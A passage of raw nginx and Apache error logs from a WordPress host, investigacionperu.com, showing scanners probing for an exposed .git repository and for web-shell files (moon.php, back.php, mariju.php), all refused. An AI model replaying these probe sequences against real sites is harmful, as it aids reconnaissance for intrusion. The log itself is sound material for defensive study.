/.git/index HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:28:00 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/logs/refs/heads/master HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:28:01 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:28:01 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/refs/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:28:13 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/packed-refs HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:28:42 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/objects/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 01:36:32 [error] 22208#22208: *413382 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:03 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:03 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/COMMIT_EDITMSG HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:03 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/FETCH_HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:03 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/ORIG_HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/description HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/hooks/post-commit HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/hooks/pre-commit HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/hooks/pre-push HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/info/exclude HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/logs/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/logs/refs/heads/master HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:04 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:10 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/objects/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:10 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/packed-refs HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:10 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/refs/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:10 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/refs/heads/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:10 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/refs/remotes/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:10 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/refs/stash HTTP/1.1", host: "investigacionperu.com" 2025/03/24 01:37:10 [error] 22208#22208: *413388 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/refs/tags/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 02:06:08 [error] 22209#22209: *413918 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:26 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:26 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/COMMIT_EDITMSG HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:26 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/FETCH_HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:32 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:32 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/ORIG_HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:32 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:33 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/description HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:33 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/hooks/post-commit HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:33 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/hooks/pre-commit HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:33 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/hooks/pre-push HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:38 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:38 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/info/exclude HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:38 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/logs/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:38 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/logs/refs/heads/master HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:38 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:38 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/objects/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:38 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/packed-refs HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:38 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/refs/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:39 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/refs/heads/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:39 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/refs/remotes/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:39 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/refs/stash HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:06:39 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/refs/tags/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:07:55 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/logs/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:07:55 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/info/exclude HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:07:57 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/refs/heads/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:07:58 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/hooks/pre-push HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:08:08 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/refs/remotes/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:08:14 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/hooks/pre-commit HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:08:14 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:08:33 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/FETCH_HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:08:40 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/refs/stash HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:08:41 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/hooks/post-commit HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:09:07 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/COMMIT_EDITMSG HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:09:35 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/refs/tags/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:09:43 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:09:48 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:10:05 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/logs/refs/heads/master HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:10:05 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:10:06 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/refs/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:10:24 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/packed-refs HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 02:11:00 [error] 22209#22209: *413919 access forbidden by rule, client: 170.39.218.246, server: mail.investigacionperu.com, request: "GET /.git/objects/ HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 04:17:17 [error] 8694#8694: *415737 access forbidden by rule, client: 170.39.218.246, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Mar 24 05:01:37.532473 2025] [:error] [pid 8744:tid 140143356729088] [client 140.245.43.10:33444] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Mon Mar 24 05:01:45.846741 2025] [:error] [pid 8744:tid 140143499405056] [client 140.245.43.10:33480] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Mon Mar 24 05:01:46.075059 2025] [:error] [pid 9340:tid 140143365121792] [client 140.245.43.10:33484] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Mon Mar 24 05:02:09.883280 2025] [:error] [pid 9340:tid 140143423870720] [client 140.245.43.10:33578] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Mar 24 05:03:07.246077 2025] [:error] [pid 8742:tid 140143465834240] [client 140.245.43.10:33798] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Mon Mar 24 05:03:30.161048 2025] [:error] [pid 8744:tid 140143432263424] [client 140.245.43.10:33890] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php 2025/03/24 05:35:19 [error] 8672#8672: *418230 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "www.investigacionperu.com" 2025/03/24 05:36:21 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:21 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/COMMIT_EDITMSG HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:21 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/FETCH_HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:21 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:21 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/ORIG_HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:21 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:21 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/description HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:21 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/hooks/post-commit HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:21 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/hooks/pre-commit HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:21 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/hooks/pre-push HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:22 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:22 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/info/exclude HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:22 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/logs/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:22 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/logs/refs/heads/master HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:22 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:22 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/objects/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:22 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/packed-refs HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:22 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/refs/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:22 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/refs/heads/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:29 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/refs/remotes/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:29 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/refs/stash HTTP/1.1", host: "investigacionperu.com" 2025/03/24 05:36:29 [error] 8694#8694: *418255 access forbidden by rule, client: 170.39.218.246, server: investigacionperu.com, request: "GET /.git/refs/tags/ HTTP/1.1", host: "investigacionperu.com" 2025/03/24 06:46:47 [error] 8694#8694: *418724 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/24 06:53:10 [error] 8694#8694: *418761 access forbidden by rule, client: 103.102.230.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 06:56:01 [error] 8672#8672: *418809 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/24 08:50:38 [error] 8672#8672: *420013 access forbidden by rule, client: 103.102.230.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/24 10:04:27 [error] 8694#8694: *420431 access forbidden by rule, client: 103.102.230.8, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/24 14:24:09 [error] 8672#8672: *424601 access forbidden by rule, client: 103.102.230.8, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 15:33:50 [error] 8672#8672: *425652 access forbidden by rule, client: 103.102.230.8, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/24 16:27:46 [error] 8672#8672: *426086 access forbidden by rule, client: 103.102.230.8, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/24 17:27:09 [error] 8694#8694: *426515 access forbidden by rule, client: 103.102.230.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 17:28:01 [error] 8694#8694: *426518 access forbidden by rule, client: 103.102.230.8, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Mar 24 17:51:23.858009 2025] [autoindex:error] [pid 9340:tid 140143306372864] [client 172.200.234.228:50630] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:51:33.572246 2025] [autoindex:error] [pid 8743:tid 140143306372864] [client 172.200.234.228:50658] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:51:34.544870 2025] [autoindex:error] [pid 8743:tid 140143339943680] [client 172.200.234.228:50662] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:51:47.308652 2025] [autoindex:error] [pid 8744:tid 140143356729088] [client 172.200.234.228:50690] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:51:58.436632 2025] [autoindex:error] [pid 8743:tid 140143457441536] [client 172.200.234.228:50718] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:52:32.214944 2025] [autoindex:error] [pid 8742:tid 140143449048832] [client 172.200.234.228:50810] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:52:40.326565 2025] [autoindex:error] [pid 9340:tid 140143491012352] [client 172.200.234.228:50830] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/03/24 17:52:40 [error] 8694#8694: *426762 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 172.200.234.228, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" [Mon Mar 24 17:53:08.184692 2025] [autoindex:error] [pid 8742:tid 140143323158272] [client 172.200.234.228:50902] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:53:21.009358 2025] [:error] [pid 8743:tid 140143398692608] [client 172.200.234.228:50936] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/back.php [Mon Mar 24 17:53:48.225538 2025] [autoindex:error] [pid 8744:tid 140143314765568] [client 172.200.234.228:51006] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:53:51.289882 2025] [autoindex:error] [pid 8742:tid 140143440656128] [client 172.200.234.228:51016] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:54:28.214958 2025] [autoindex:error] [pid 8742:tid 140143457441536] [client 172.200.234.228:51110] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:55:24.982783 2025] [autoindex:error] [pid 8742:tid 140143449048832] [client 172.200.234.228:51256] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:56:27.989125 2025] [autoindex:error] [pid 8744:tid 140143423870720] [client 172.200.234.228:51416] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:57:22.348693 2025] [autoindex:error] [pid 8744:tid 140143314765568] [client 172.200.234.228:51572] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:57:24.558412 2025] [autoindex:error] [pid 9340:tid 140143457441536] [client 172.200.234.228:51580] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 24 17:57:31.368560 2025] [autoindex:error] [pid 9340:tid 140143381907200] [client 172.200.234.228:51600] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex 